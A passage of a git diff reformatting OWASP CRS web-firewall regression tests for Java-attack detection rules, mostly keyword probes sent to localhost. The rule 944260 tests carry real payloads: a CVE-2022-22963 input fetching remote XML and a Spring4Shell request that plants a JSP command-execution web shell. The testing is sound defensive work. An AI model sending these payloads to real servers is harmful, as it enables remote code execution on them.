port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.whileclosure" - output: - log_contains: "id \"944240\"" - - test_title: 944240-87 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.whileclosure" + output: + log: + expect_ids: [944240] + - test_id: 87 desc: "Content-Type application/json arg value includes keyword runtime.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"runtime.whileclosure\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-88 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.whileclosure\"}" + output: + log: + expect_ids: [944240] + - 
test_id: 88 desc: "Content-Type application/json arg name includes keyword runtime.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"runtime.whileclosure\": \"test\"}" - output: - log_contains: "id \"944240\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"runtime.whileclosure\": \"test\"}" + output: + log: + expect_ids: [944240] diff --git a/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml b/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml index b8b744b..b9aa247 100644 --- a/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml +++ b/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml 
@@ -1,453 +1,451 @@ --- meta: author: "spartantri, azurit" - enabled: true - name: "944250.yaml" - description: "Positive tests for rule 944250" +rule_id: 944250 tests: - - test_title: 944250-1 + - test_id: 1 desc: "Argument test includes keyword java.evil.runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.evil.runtime" - output: - log_contains: "id \"944250\"" - - test_title: 944250-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.evil.runtime" + output: + log: + expect_ids: [944250] + - test_id: 2 desc: "Argument name includes keyword java.evil.runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.evil.runtime=test" - output: - log_contains: "id \"944250\"" - - test_title: 944250-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.evil.runtime=test" + output: + log: + expect_ids: [944250] + - test_id: 3 desc: "Cookie test includes keyword java.evil.runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.evil.runtime - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944250\"" - - test_title: 944250-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.evil.runtime + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944250] + - test_id: 4 desc: "Cookie name includes keyword java.evil.runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.evil.runtime=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: 
"test=value" - output: - log_contains: "id \"944250\"" - - test_title: 944250-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.evil.runtime=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944250] + - test_id: 5 desc: "Request header test includes keyword java.evil.runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.evil.runtime - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944250\"" - - test_title: 944250-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.evil.runtime + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944250] + - test_id: 6 desc: "XML attribute value includes keyword java.evil.runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944250\"" - - test_title: 944250-7 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944250] + - test_id: 7 desc: "XML element value includes keyword java.evil.runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.evil.runtime" - output: - log_contains: "id \"944250\"" - - test_title: 944250-8 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.evil.runtime" + output: + log: + expect_ids: [944250] + - test_id: 8 desc: "Nested XML element value includes keyword java.evil.runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: 
"localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.evil.runtime" - output: - log_contains: "id \"944250\"" - - test_title: 944250-9 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.evil.runtime" + output: + log: + expect_ids: [944250] + - test_id: 9 desc: "Content-Type text/plain includes keyword java.evil.runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.evil.runtime" - output: - log_contains: "id \"944250\"" - - test_title: 944250-10 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.evil.runtime" + output: + log: + expect_ids: [944250] + - test_id: 10 desc: "Content-Type application/json arg value includes keyword java.evil.runtime" 
stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.evil.runtime\"}" - output: - log_contains: "id \"944250\"" - - test_title: 944250-11 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.evil.runtime\"}" + output: + log: + expect_ids: [944250] + - test_id: 11 desc: "Content-Type application/json arg name includes keyword java.evil.runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.evil.runtime\": \"test\"}" - output: - log_contains: "id \"944250\"" - - test_title: 944250-12 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: 
"{\"java.evil.runtime\": \"test\"}" + output: + log: + expect_ids: [944250] + - test_id: 12 desc: "Argument test includes keyword java.evil.processbuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.evil.processbuilder" - output: - log_contains: "id \"944250\"" - - test_title: 944250-13 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.evil.processbuilder" + output: + log: + expect_ids: [944250] + - test_id: 13 desc: "Argument name includes keyword java.evil.processbuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.evil.processbuilder=test" - output: - log_contains: "id \"944250\"" - - test_title: 944250-14 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.evil.processbuilder=test" + output: + log: + expect_ids: [944250] + - test_id: 14 desc: "Cookie test includes keyword java.evil.processbuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.evil.processbuilder - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944250\"" - - test_title: 944250-15 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.evil.processbuilder + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944250] + - test_id: 15 desc: "Cookie name includes keyword java.evil.processbuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.evil.processbuilder=test - method: "POST" - uri: 
"/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944250\"" - - test_title: 944250-16 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.evil.processbuilder=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944250] + - test_id: 16 desc: "Request header test includes keyword java.evil.processbuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.evil.processbuilder - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944250\"" - - test_title: 944250-17 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.evil.processbuilder + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944250] + - test_id: 17 desc: "XML attribute value includes keyword java.evil.processbuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944250\"" - - test_title: 944250-18 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944250] + - test_id: 18 desc: "XML element value includes keyword java.evil.processbuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.evil.processbuilder" - output: - log_contains: "id \"944250\"" - - test_title: 944250-19 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.evil.processbuilder" + output: + log: + expect_ids: [944250] + - test_id: 19 desc: "Nested XML element value includes keyword java.evil.processbuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - 
port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.evil.processbuilder" - output: - log_contains: "id \"944250\"" - - test_title: 944250-20 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.evil.processbuilder" + output: + log: + expect_ids: [944250] + - test_id: 20 desc: "Content-Type text/plain includes keyword java.evil.processbuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.evil.processbuilder" - output: - log_contains: "id \"944250\"" - - test_title: 944250-21 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.evil.processbuilder" + output: + log: + expect_ids: [944250] + - test_id: 21 desc: 
"Content-Type application/json arg value includes keyword java.evil.processbuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.evil.processbuilder\"}" - output: - log_contains: "id \"944250\"" - - test_title: 944250-22 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.evil.processbuilder\"}" + output: + log: + expect_ids: [944250] + - test_id: 22 desc: "Content-Type application/json arg name includes keyword java.evil.processbuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.evil.processbuilder\": \"test\"}" - output: - log_contains: "id \"944250\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.evil.processbuilder\": \"test\"}" + output: + log: + expect_ids: [944250] diff --git a/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944260.yaml b/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944260.yaml index 144d3f5..d6a8d28 100644 --- a/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944260.yaml +++ b/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944260.yaml 
@@ -1,41 +1,39 @@ --- meta: author: "theMiddle, azurit" - enabled: true - name: "944260.yaml" - description: "Positive tests for rule 944260" +rule_id: 944260 tests: - - test_title: 944260-1 + - test_id: 1 desc: "CVE-2022-22963" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.1" - data: "_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://127.1.2.3/wb.xml')" - output: - log_contains: "id \"944260\"" - - test_title: 944260-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.1" + data: "_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://127.1.2.3/wb.xml')" + output: + log: + expect_ids: [944260] + - test_id: 2 desc: "Spring Framework RCE" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.1" - data: 
"class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=" - output: - log_contains: "id \"944260\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.1" + data: 